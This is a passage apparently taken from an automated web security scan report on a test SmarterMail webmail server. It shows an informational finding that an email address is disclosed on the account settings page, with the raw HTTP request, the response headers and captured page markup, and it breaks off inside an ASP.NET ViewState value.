$('#ctl00_MPH_wucUserSettings_txtChangePassword_CurrentPassword_SettingText').val('');
$('#ctl00_MPH_wucUserSettings_txtNP_SettingText').val('');
$('#ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_SettingText').val('');
Sys.Application.initialize();
$(function() { SetTopTitle('Account\x20Settings\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
$(function() { $('#ctl00_TPH_TabStrip').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_wucUserSettings_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_TabStrip_tabUser":"ctl00_MPH_wucUserSettings_pvUserInformation","ctl00_TPH_TabStrip_tabDisplay":"ctl00_MPH_wucUserSettings_pvDisplaySettings","ctl00_TPH_TabStrip_tabCompose":"ctl00_MPH_wucUserSettings_pvComposeSettings","ctl00_TPH_TabStrip_tabForward":"ctl00_MPH_wucUserSettings_pvForwarding","ctl00_TPH_TabStrip_tabPlusAddress":"ctl00_MPH_wucUserSettings_pvPlusAddressing"},"ClientCallbacks":{}}); });
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm Password","vcID":"ctl00_MPH_wucUserSettings_txtNewPasswordConfirmed_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"New Password","vmMustMatchField":"ctl00_MPH_wucUserSettings_txtNP_SettingText"}},false);});
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Display Name","vcID":"ctl00_MPH_wucUserSettings_txtDisplayName_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Reply-To Email Address","vcID":"ctl00_MPH_wucUserSettings_txtReplyToAddress_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Forwarding Address","vcID":"ctl00_MPH_wucUserSettings_txtForwardingAddress_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Reply Text Indicator","vcID":"ctl00_MPH_wucUserSettings_txtReplyIndicator_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


7.7. http://vulnerable.smartermail.site:9998/Main/frmMySettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /Main/frmMySettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Main/frmMySettings.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.smartermail.site:9998/Default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 16:02:44 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 56960



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Account Settings - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
   <form method="post" action="frmMySettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTMwNTY1MDYyMA8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCgIDD2QWAgIBD2QWAgIDDw8WAh4HVmlzaWJsZWhkZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8CaGQCBg8WAh8CaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgJmD2QWDAICD2QWAgIBD2QWKGYPDxYCHgpfX3JlYWRPbmx5Z2QWAgIBD2QWAgICDw8WAh8EBQZ0ZXN0aXRkZAIBDw8WAh8CaGQWAgIBD2QWAmYPEGQQFQILU21hcnRlck1haWwQQWN0aXZlIERpcmVjdG9yeRUCATABMRQrAwJnZxYBZmQCAg8PFgIfAmhkFgICAQ9kFgRmDw8WAh8EZWRkAgIPDxYCHwRlZGQCAw8PFgIfAmhkFgICAQ9kFgRmDw8WAh8EBQUxMjM0NWRkAgIPDxYCHwQFBTEyMzQ1ZGQCBA9kFgICAQ9kFgJmDw9kFgIeDGF1dG9jb21wbGV0ZQUDb2ZmZAIFD2QWAgIBD2QWAmYPD2QWAh8GBQNvZmZkAgYPZBYCAgEPZBYCZg8PZBYCHwYFA29mZmQCBw9kFgICAQ9kFgICAg8PFgIfBAUSdGVzdGl0QGhveXRsbGMuY29tZGQCCA9kFgICAQ9kFgICAg8PFgIfBGVkZAIJD2QWAgIBD2QWAmYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1h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AgRodG1sBXBsYWluFCsDAmdnZGQCAg9kFgICAQ9kFgJmDxBkEBUEBEZyb20HU3ViamVjdARTaXplBERhdGUVBARGcm9tB1N1YmplY3QEU2l6ZQxJbnRlcm5hbERhdGUUKwMEZ2dnZ2RkAgMPZBYCAgEPZBYCZg8QZBAVBBxNb3ZlIHRvIERlbGV0ZWQgSXRlbXMgRm9sZGVyEUF1dG8gUHVyZ2UgRm9sZGVyD01hcmsgYXMgRGVsZXRlZBhNYXJrIGFzIERlbGV0ZWQgYW5kIEhpZGUVBAEwATEBMgEzFCsDBGdnZ2dkZAIEDw8WAh8CaGQWAgIBD2QWAmYPEGQPFgFmFgEQBQdEZWZhdWx0BQdEZWZhdWx0ZxYBZmQCBQ9kFgICAQ9kFgJmDxBkEBUDBkJvdHRvbQpSaWdodCBTaWRlCERpc2FibGVkFQMGYm90dG9tBXJpZ2h0CGRpc2FibGVkFCsDA2dnZ2RkAgsPZBYCAgEPZBYCZg8QDxYCHwdnZGRkZAIKD2QWAgIBD2QWEGYPZBYCAgEPZBYCZg8QZBAVAgRIVE1MBFRleHQVAgRodG1sBXBsYWluFCsDAmdnZGQCAQ9kFgICAQ9kFgRmDxBkEBUKBUFyaWFsB0NvdXJpZXIHR2VvcmdpYQZMdWNpZGEOTHVjaWRhIENvbnNvbGUIUGFsYXRpbm8GVGFob21hBVRpbWVzCVRyZWJ1Y2hldAdWZXJkYW5hFQocQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZhZDb3VyaWVyIE5ldywgbW9ub3NwYWNlDkdlb3JnaWEsIHNlcmlmLkx1Y2lk